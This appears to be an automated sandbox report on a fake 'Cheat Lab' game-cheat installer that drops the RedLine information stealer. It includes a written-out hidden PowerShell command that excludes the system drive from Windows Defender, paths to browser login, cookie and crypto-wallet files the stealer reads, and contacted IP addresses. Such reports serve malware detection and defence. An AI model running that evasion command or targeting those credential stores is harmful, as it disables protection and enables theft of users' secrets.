                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B08900 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF738B08900
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE07DBB8 SetUnhandledExceptionFilter,18_2_00007FF6FE07DBB8
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE07D9D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF6FE07D9D4
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE07D0B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FF6FE07D0B0
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0A8900 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF6FE0A8900
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00402E36 SetUnhandledExceptionFilter,22_2_00402E36
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00403CF1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00403CF1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_004042F5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_004042F5
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040635F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0040635F

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"Jump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.luaJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"Jump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F352F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,6_2_00F352F0
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: EnumSystemLocalesW,6_2_00F6E0C6
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: EnumSystemLocalesW,6_2_00F6E1AC
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: EnumSystemLocalesW,6_2_00F67132
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: EnumSystemLocalesW,6_2_00F6E111
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_00F6E237
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: GetLocaleInfoEx,6_2_00F523F8
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: GetLocaleInfoW,6_2_00F6E48A
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_00F6E5B3
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: GetLocaleInfoW,6_2_00F6E6B9
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: GetLocaleInfoW,6_2_00F676AF
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00F6E788
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_00F6DE24
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: try_get_function,GetLocaleInfoW,9_2_00007FF738B09934
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,9_2_00007FF738B1A03C
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: EnumSystemLocalesW,9_2_00007FF738B092FC
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00007FF738B1AA70
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: EnumSystemLocalesW,9_2_00007FF738B1A388
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: EnumSystemLocalesW,9_2_00007FF738B1A458
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_00007FF738B1A894
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,18_2_00007FF6FE0BA03C
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: try_get_function,GetLocaleInfoW,18_2_00007FF6FE0A9934
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: EnumSystemLocalesW,18_2_00007FF6FE0A92FC
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_00007FF6FE0BAA70
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_00007FF6FE0BA894
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: EnumSystemLocalesW,18_2_00007FF6FE0BA388
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: EnumSystemLocalesW,18_2_00007FF6FE0BA458
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoA,22_2_00406EFC
                    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F535A9 cpuid 6_2_00F535A9
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F537D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00F537D5
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F67B1F GetTimeZoneInformation,6_2_00F67B1F
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: connect.exe, 00000016.00000003.2108521517.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2107771708.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2107871352.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2107590031.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2107658316.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2107985123.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2108436153.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2108353413.00000000081E0000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2107521201.00000000081DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 22.2.connect.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.connect.exe.460000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.2131526170.000000000040D000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2131675948.0000000000462000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: connect.exe PID: 4584, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                    Source: connect.exe, 00000016.00000002.2145649555.00000000081FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*F9
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                    Source: connect.exe, 00000016.00000002.2145649555.00000000081FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*F9
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                    Source: connect.exe, 00000016.00000002.2145649555.00000000081FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*F9
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                    Source: Yara matchFile source: 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2133528800.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: connect.exe PID: 4584, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 22.2.connect.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.connect.exe.460000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.2131526170.000000000040D000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2131675948.0000000000462000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: connect.exe PID: 4584, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    1
                    Replication Through Removable Media                    		221
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		1
                    Replication Through Removable Media                    		1
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Ingress Tool Transfer                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scripting                    		1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory11
                    Peripheral Device Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		Exfiltration Over Bluetooth11
                    Encrypted Channel                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts3
                    Native API                    		1
                    Registry Run Keys / Startup Folder                    		11
                    Process Injection                    		1
                    Scripting                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Non-Standard Port                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local Accounts3
                    Command and Scripting Interpreter                    		Logon Script (Mac)1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		NTDS135
                    System Information Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer2
                    Non-Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud Accounts1
                    Scheduled Task/Job                    		Network Logon Script1
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		LSA Secrets251
                    Security Software Discovery                    		SSHKeyloggingData Transfer Size Limits13
                    Application Layer Protocol                    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable Media1
                    PowerShell                    		Rc.commonRc.common1
                    File Deletion                    		Cached Domain Credentials241
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items123
                    Masquerading                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job241
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    Application Window Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    System Network Configuration Discovery                    		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1337697 Sample: Cheat.Lab.2.7.2.msi Startdate: 06/11/2023 Architecture: WINDOWS Score: 60 69 ip-api.com 2->69 71 cdn.discordapp.com 2->71 81 Snort IDS alert for network traffic 2->81 83 Found malware configuration 2->83 85 Antivirus detection for URL or domain 2->85 87 4 other signatures 2->87 9 LuaJIT.exe 10 35 2->9         started        13 msiexec.exe 10 38 2->13         started        16 msiexec.exe 16 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 75 193.37.71.112, 49708, 80 VAD-SRL-AS1MD Russian Federation 9->75 77 ip-api.com 208.95.112.1, 49706, 80 TUT-ASUS United States 9->77 79 cdn.discordapp.com 162.159.135.233, 443, 49709, 49710 CLOUDFLARENETUS United States 9->79 51 C:\Users\user\AppData\Roaming\...\connect.exe, PE32 9->51 dropped 53 C:\ProgramData\...53zEz.exe, PE32+ 9->53 dropped 55 C:\ProgramData\...\script.lua, data 9->55 dropped 20 connect.exe 8 5 9->20         started        24 schtasks.exe 1 9->24         started        26 schtasks.exe 1 9->26         started        57 C:\Windows\Installer\MSIC01A.tmp, PE32 13->57 dropped 59 C:\Program Files\Cheat Lab Inc\...\LuaJIT.exe, PE32+ 13->59 dropped 61 C:\Windows\Installer\MSICA9B.tmp, PE32 13->61 dropped 65 6 other files (none is malicious) 13->65 dropped 101 Drops executables to the windows directory (C:\Windows) and starts them 13->101 28 MSIC01A.tmp 1 13->28         started        30 msiexec.exe 1 13->30         started        32 msiexec.exe 13->32         started        34 msiexec.exe 2 13->34         started        63 C:\Users\user\AppData\Local\...\MSID76E.tmp, PE32 16->63 dropped 67 10 other files (none is malicious) 16->67 dropped file6 signatures7 process8 dnsIp9 73 91.103.252.48, 33597, 49715 